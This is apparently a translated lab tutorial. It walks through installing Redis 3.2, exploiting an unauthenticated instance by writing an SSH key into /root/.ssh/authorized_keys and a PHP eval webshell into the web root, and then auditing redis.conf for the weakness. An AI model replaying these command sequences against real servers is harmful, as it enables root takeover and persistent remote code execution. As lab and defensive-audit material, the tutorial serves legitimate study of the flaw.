# Installing Redis

```bash
wget http://download.redis.io/releases/redis-3.2.11.tar.gz   # download Redis
tar zxvf redis-3.2.11.tar.gz                                  # extract
cd redis-3.2.11
make
make test
cp redis.conf /etc/
cd src/
cp redis-server /usr/bin/
cp redis-cli /usr/bin/
cd ../
vim /etc/redis.conf
redis-server /etc/redis.conf
```

* Error 1: `gcc:命令未找到` (gcc: command not found)

```bash
yum install gcc-c++
```

* Error 2: `You need tcl 8.5 or newer in order to run the Redis test`

```bash
wget http://downloads.sourceforge.net/tcl/tcl8.6.1-src.tar.gz
sudo tar xzvf tcl8.6.1-src.tar.gz -C /usr/local/
cd /usr/local/tcl8.6.1/unix/
sudo ./configure
sudo make
sudo make install
```

* Error 3: `致命错误:jemalloc/jemalloc.h:没有那个文件或目录` (fatal error: jemalloc/jemalloc.h: No such file or directory)

```bash
make MALLOC=libc
```

# Verifying unauthorized access

# Writing an SSH public key to gain operating-system access

Target machine:

```bash
ifconfig
cd redis-3.2.11
ssh-keygen -t rsa
```
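Attacking machine:

```
cd redis-3.2.11
redis-cli -h <target-address>
keys *                                  # returns (empty list or set)
exit
ssh root@<target-address>               # prompts for a password
Ctrl+C                                  # abort
ssh-keygen -t rsa                       # generate an SSH key pair
cd /root/.ssh
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n")>key.txt   # write the public key to key.txt
cp key.txt /redis-3.2.11/
cd /redis-3.2.11/
cat key.txt|redis-cli -h <target-address> -x set crack   # write the file contents into the key crack
redis-cli -h <target-address>           # connect to the Redis service on the target
get crack
config get dir
config set dir /root/.ssh               # switch the Redis data file directory to .ssh
config set dbfilename "authorized_keys" # name the dump file holding the uploaded public key authorized_keys
save
exit
ssh root@<target-address>
# login succeeds
```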

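* Error 1: `No route to host`

Settings on the target machine:

```bash
firewall-cmd --query-port=6379/tcp            # check whether port 6379 is open to the outside
firewall-cmd --add-port=6379/tcp --permanent  # open port 6379
systemctl restart firewalld                   # restart the firewall
firewall-cmd --list-ports                     # list open ports
```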

# Writing a webshell

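Target machine:

```bash
yum update httpd
yum install httpd
systemctl start httpd
firewall-cmd --add-port=80/tcp --permanent   # open port 80
systemctl restart firewalld                  # restart the firewall
```

Open the target machine's address in a browser; the web server's page should be displayed.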

Attacking machine:

```
redis-cli -h <target-address>
config set dir /var/www/html
set xxx "\n\n<?php @eval($_POST['salt']);?>\n\n"
config set dbfilename webshell.php
save
exit
```
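
Both file-write procedures above (authorized_keys and webshell.php) depend on the same server-side conditions: Redis accepting remote clients without a password, and the CONFIG command being available to them. The check below is an added example, not part of the original post; the function names and both sample configuration files are constructed for illustration, and the protected-mode logic follows Redis 3.2 behaviour.

```python
# Constructed sample: a redis.conf edited so remote clients need no password.
WEAK_CONF = """\
# bind 127.0.0.1
protected-mode no
port 6379
dir ./
"""

# Constructed sample: the same file with the exposure closed.
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass CHANGE-ME-long-random-secret
rename-command CONFIG ""
dir /var/lib/redis
"""

LOOPBACK = {"127.0.0.1", "::1"}


def parse_conf(text):
    """Map each directive to the list of argument lists it was given."""
    conf = {}
    for line in text.splitlines():
        parts = line.split()
        if parts and not parts[0].startswith("#"):
            conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit(text):
    """Return findings that leave the CONFIG SET dir/dbfilename + SAVE write reachable."""
    conf = parse_conf(text)
    findings = []
    binds = {addr for args in conf.get("bind", []) for addr in args}
    has_pass = any(args for args in conf.get("requirepass", []))
    mode = [args[0].lower() for args in conf.get("protected-mode", []) if args]
    protected = (mode[-1] if mode else "yes") == "yes"  # Redis 3.2 default is yes
    if binds - LOOPBACK and not has_pass:
        findings.append("non-loopback bind without requirepass")
    if not binds and not protected and not has_pass:
        findings.append("no bind, protected-mode off, no requirepass")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed or disabled")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text))
```

The configuration file alone does not show which account runs redis-server; the write into /root/.ssh above additionally requires the server to run as root, so run it as an unprivileged user.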